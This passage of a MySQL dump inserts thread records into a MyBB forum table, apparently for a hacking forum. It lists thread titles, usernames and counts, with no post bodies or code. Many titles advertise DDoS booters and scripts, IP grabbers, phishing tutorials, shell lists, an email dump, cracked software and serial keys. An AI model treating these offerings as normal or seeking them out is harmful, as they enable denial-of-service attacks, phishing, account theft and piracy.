'1351096729', 'VirtualLegend', '228', '71', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('610', '61', 'Free Skype Resolver - Fast Resolve!', '0', '0', '0', '82', 'iTzIpod', '1349020752', '2971', '1349052243', 'iTzIpod', '82', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('611', '61', 'Another Webbased Skype IP Resolver!', '0', '0', '0', '82', 'iTzIpod', '1349020945', '2972', '1349020945', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('612', '66', 'Rate this edit?', '0', '0', '0', '82', 'iTzIpod', '1349024570', '2976', '1349024570', 'iTzIpod', '82', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('613', '66', 'Some Changes that will be made', '0', '0', '0', '61', 'NXK', '1349024681', '2977', '1351167089', 'NXK', '61', '95', '21', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('614', '3', 'Absence for 5 days', '0', '0', '0', '53', 'sirchamp', '1349033023', '3002', '1349036628', 't3h jok3r', '1', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('615', '21', 'Could somone test the output of 2 differen\'t booters I use?', '0', '0', '0', '100', '??zg???g????61', '1349033390', '3004', '1349049708', '??zg???g????61', '100', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('616', '67', '[PHP] IP Grabbing Script', '0', '0', '0', '82', 'iTzIpod', '1349034777', '3005', '1349142397', 't3h jok3r', '1', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('617', '34', 'Absract Photoshop Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349035770', '3006', '1349035770', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('618', '34', 'Animated/Running Text Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349035855', '3007', '1349035855', 'iTzIpod', '82', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('619', '34', '[Photoshop CS5] How to make a logo', '0', '0', '0', '82', 'iTzIpod', '1349035943', '3008', '1350271825', 'iTzIpod', '82', '26', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('620', '34', '? Photoshop ? Complete Guide for Begginers [High Quality]', '0', '0', '0', '82', 'iTzIpod', '1349036135', '3009', '1349036135', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('621', '61', 'Free Skype Credits from Bing Rewards', '0', '0', '0', '82', 'iTzIpod', '1349036377', '3011', '1349036377', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('622', '42', 'Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '0', '0', '82', 'iTzIpod', '1349037236', '3013', '1349374549', '??zg???g????61', '100', '22', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('623', '42', 'Mom poured bleach into baby\'s eyes', '0', '0', '0', '82', 'iTzIpod', '1349037328', '3014', '1349037328', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('624', '42', 'Aliens Found In Brazil (Photos - Fake or Real)?', '0', '0', '0', '82', 'iTzIpod', '1349037413', '3015', '1349048847', 't3h jok3r', '1', '14', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('625', '61', 'Runescape Phishing Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349039715', '3019', '1349090043', 'iTzIpod', '82', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('626', '19', '[Junk]?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '0', '0', '82', 'iTzIpod', '1349040117', '3020', '1349124385', 'iTzIpod', '82', '12', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('627', '33', 'What can I do to improve this?', '0', '0', '0', '82', 'iTzIpod', '1349048760', '3027', '1350843495', 'iTzIpod', '82', '69', '18', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('630', '19', '[Junk]Why So? TEST', '0', '0', '0', '3', '??????????¢™', '1349051153', '3052', '1349051227', '??????????¢™', '3', '9', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('628', '19', '[Junk]Spoiler Test', '0', '0', '0', '3', '??????????¢™', '1349050161', '3044', '1349050226', '??????????¢™', '3', '8', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('629', '21', '[FREE] Giving Away DrDos Script [FREE]', '0', '0', '0', '100', '??zg???g????61', '1349104357', '3047', '1349538006', 'Jacob', '160', '38', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('631', '61', '45565 Shells', '0', '0', '0', '82', 'iTzIpod', '1349051556', '3055', '1349051556', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('632', '61', '1000 Emails Dump', '0', '0', '0', '82', 'iTzIpod', '1349051700', '3056', '1349052152', 'iTzIpod', '82', '3', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('633', '19', '[Junk]JOKER!!!!!!!!???????!!!!!!!!!!', '0', '0', '0', '3', '??????????¢™', '1349051866', '3060', '1349052066', '??????????¢™', '3', '10', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('635', '7', '[Milestone] L33tHacking Forum Total 3,000 Posts', '0', '0', '0', '82', 'iTzIpod', '1349061044', '3085', '1349378474', 'iTzIpod', '82', '14', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('636', '15', 'Free Host Booter', '0', '0', '0', '207', 'Combat', '1349069555', '3091', '1349069555', 'Combat', '207', '18', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('634', '7', 'Depressed', '0', '5', '0', '203', 'NeonLights', '1349053684', '3075', '1349268291', 'mothered', '205', '23', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('637', '16', 'I need to SE a gaming keyboard', '0', '0', '0', '62', 'R?????zo?', '1349092111', '3098', '1349609441', 'R?????zo?', '62', '51', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('638', '61', '100k+ Proxy List', '0', '0', '0', '82', 'iTzIpod', '1349092741', '3102', '1349092741', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('639', '66', '[News] Updates,Releases,Edits', '0', '0', '0', '61', 'NXK', '1349100608', '3107', '1349100608', 'NXK', '61', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('640', '21', 'sad', '0', '0', '0', '100', '??zg???g????61', '1349104320', '3109', '1349104320', '??zg???g????61', '100', '0', '0', '', '0', '0', '0', '', '-2', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('647', '14', 'VPNReactor (Free/Paid) **Deletes Logs**', '0', '0', '0', '5', 'Timmy', '1349143704', '3167', '1349784317', 'mothered', '205', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('641', '42', 'File-Sharing for Personal Use Declared Legal in Portugal', '0', '0', '0', '62', 'R?????zo?', '1349106003', '3113', '1349198919', 'R?????zo?', '62', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('642', '61', '[FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '0', '0', '62', 'R?????zo?', '1349107590', '3115', '1349374287', '??zg???g????61', '100', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('643', '7', 'L33thakcers.com members here?', '0', '0', '0', '213', 'BitMonst3r', '1349107675', '3116', '1349618716', 'BitMonst3r', '213', '45', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('644', '19', '[Junk]Testing', '0', '0', '0', '82', 'iTzIpod', '1349127944', '3143', '1349127944', 'iTzIpod', '82', '5', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('645', '30', '[GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '0', '0', '1', 't3h jok3r', '1349141839', '3154', '1349323206', 't3h jok3r', '1', '5', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('646', '29', '[Tutorial] Hack RealityKing The biggest Hack!! WATCH FULL MOVIES *HOT*', '0', '0', '0', '5', 'Timmy', '1349142670', '3157', '1349142670', 'Timmy', '5', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('648', '19', '[Junk]Testing', '0', '0', '0', '82', 'iTzIpod', '1349143901', '3172', '1349144129', 'iTzIpod', '82', '6', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('649', '3', 'Thanks to the following and L33THacking Monthly Stats', '0', '0', '0', '1', 't3h jok3r', '1349144845', '3179', '1349320849', 'Timmy', '5', '45', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('651', '61', '[Free] Thread Design', '0', '0', '0', '82', 'iTzIpod', '1349205877', '3200', '1349205877', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('650', '61', '[LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '8', '0', '100', '??zg???g????61', '1349189593', '3193', '1349373984', '??zg???g????61', '100', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('652', '7', 'Being CyberBullied', '0', '0', '0', '82', 'iTzIpod', '1349221795', '3206', '1349405476', 't3h jok3r', '1', '104', '29', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('653', '43', 'Photoshop CS5 Serial Keys', '0', '0', '0', '1', 't3h jok3r', '1349234647', '3222', '1349264295', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('654', '9', 'Make money typing captchas', '0', '0', '0', '8', 'spacefish36', '1349235229', '3226', '1349984337', 'iTzIpod', '82', '42', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('656', '8', 'why do ppl like this shitty song!?!?', '0', '0', '0', '203', 'NeonLights', '1349304875', '3267', '1351623460', 't3h jok3r', '1', '42', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('655', '43', 'ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '0', '0', '100', '??zg???g????61', '1349284820', '3253', '1349616231', '??zg???g????61', '100', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('657', '19', '[Junk]why do ppl like this shitty song!?!?', '0', '0', '0', '203', 'NeonLights', '1349304913', '3268', '1349305354', 'iTzIpod', '82', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('658', '52', '[Source]FB login + FB freezer using httpwebrequest', '0', '0', '0', '7', 'Romdu62', '1349319847', '3286', '1349319847', 'Romdu62', '7', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('659', '64', 'Stolen (2012) Movie RIP', '0', '0', '0', '5', 'Timmy', '1349320608', '3293', '1349410450', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('660', '30', 'Vulcan Private Logger', '0', '0', '0', '5', 'Timmy', '1349323439', '3300', '1349561397', '??zg???g????61', '100', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('661', '50', 'Bullshit', '0', '0', '0', '3', '??????????¢™', '1349325207', '3303', '1349403949', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('662', '7', 'Is this how you treat me?', '0', '0', '0', '3', '??????????¢™', '1349325643', '3306', '1349498293', 't3h jok3r', '1', '139', '30', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('674', '24', 'Oh NO! Learn how to destroy your hard drive completely', '0', '0', '0', '9', 'p420', '1349408586', '3412', '1349414607', 'mothered', '205', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('663', '61', 'Tons of shells (Unchecked)', '0', '0', '0', '82', 'iTzIpod', '1349392422', '3378', '1349392422', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, 